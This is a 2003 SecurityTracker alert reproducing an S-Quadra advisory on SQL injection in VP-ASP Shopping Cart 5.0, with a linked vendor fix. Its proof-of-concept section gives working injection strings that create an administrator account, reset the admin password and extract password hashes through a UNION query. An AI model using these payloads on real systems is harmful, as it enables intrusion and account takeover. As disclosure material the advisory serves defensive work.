VP-ASP Input Validation Flaws in 'shopsearch' and 'shopdisplayproducts' Let Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1008351
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 2 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: S-Quadra Security Research
|
Version(s): 5.0
|
Description: Several input validation vulnerabilities were reported in the VP-ASP shopping cart software. A remote user can execute arbitrary commands on the target system.
S-Quadra reported that there are SQL injection flaws in 'shopsearch.asp' and 'shopdisplayproducts.asp'.
It is reported that the
'shopsearch.asp' script does not validate or filter user-supplied input before using the input as part of an SQL query. A remote
user can submit a specially crafted query to execute commands with administrative privileges, such as adding a new user account.
A remote user may also be able to execute arbitrary commands.
It is also reported that a remote user can inject SQL commands
via the 'shopdisplayproducts.asp' script. A remote user can read arbitrary information from the database.
Some demonstration
exploit examples are provided in the Source Message.
The vendor was reportedly notified on November 28, 2003.
|
Impact: A remote user can execute arbitrary commands on the target system with the privileges of the target web server.
|
Solution: The vendor has released a fix, available at:
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm
|
Vendor URL: www.vpasp.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: S-Quadra Security Research <research@s-quadra.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 01 Dec 2003 16:15:53 +0300
From: S-Quadra Security Research <research@s-quadra.com>
Subject: [Full-Disclosure] Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection
|
S-Quadra Advisory #2003-11-28
Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL
Injection Vulnerabilities
Severity: Average
Vendor URL: http://www.vpasp.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
Release date: 28 Nov 2003
1. DESCRIPTION
Virtual Programming VP-ASP is a shopping cart application for e-commerce
enabled sites.
It is written in ASP, supports the following databases: Access, MSSQL,
MYSQL
on Windows and MYSQL on Unix.
VP-ASP suffers from SQL injection vulnerabilities, which may allow an
attacker
in some cases to gain administrative access to the installed VP-ASP
Shopping Cart software
or execute arbitrary commands on a target's system.
2. DETAILS
-- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script
An SQL Injection vulnerability has been found in the shopsearch.asp script.
User supplied input is not filtered before being used in a SQL query.
Consequently,
query modification using malformed input is possible. Exploitation of
the vulnerability
allows a remote attacker to insert a new user with administrative
privileges.
A more sophisticated exploitation would allow a remote attacker to
execute arbitrary commands
on a target's system (via MSSQL xp_cmdshell() function for example).
-- PoC code 1:
Platform: Win32/MSSQL
Posting this data to shopsearch.asp creates new administrative account
Keyword=&category=5); insert into tbluser (fldusername) values
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin password
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
-- Vulnerability 2: SQL Injection vulnerability in
'shopdisplayproducts.asp' script
An SQL Injection vulnerability has been found in the
shopdisplayproducts.asp script.
Exploitation of the vulnerability will allow remote attacker to read any
information from a database.
-- PoC code 2:
Platform: Win32/MSSQL
http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%
20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from VP-ASP web server attacker
can find the admin password.
3. FIX INFORMATION
S-Quadra alerted VP-ASP development team to this issue on 28th November
2003.
Security fixes from VP-ASP development team available at
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm
4. CREDITS
Nick Gudov <cipher@s-quadra.com> is responsible for discovering
this issue.
5. ABOUT
S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and
third party product
vulnerability assesment, forensic support and reverse engineering.
Security is an art and our goal is to bring responsible and high quality
security service to the IT market, customized to meet the unique needs
of each
individual client.
S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.
S-Quadra Advisory #2003-11-28
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
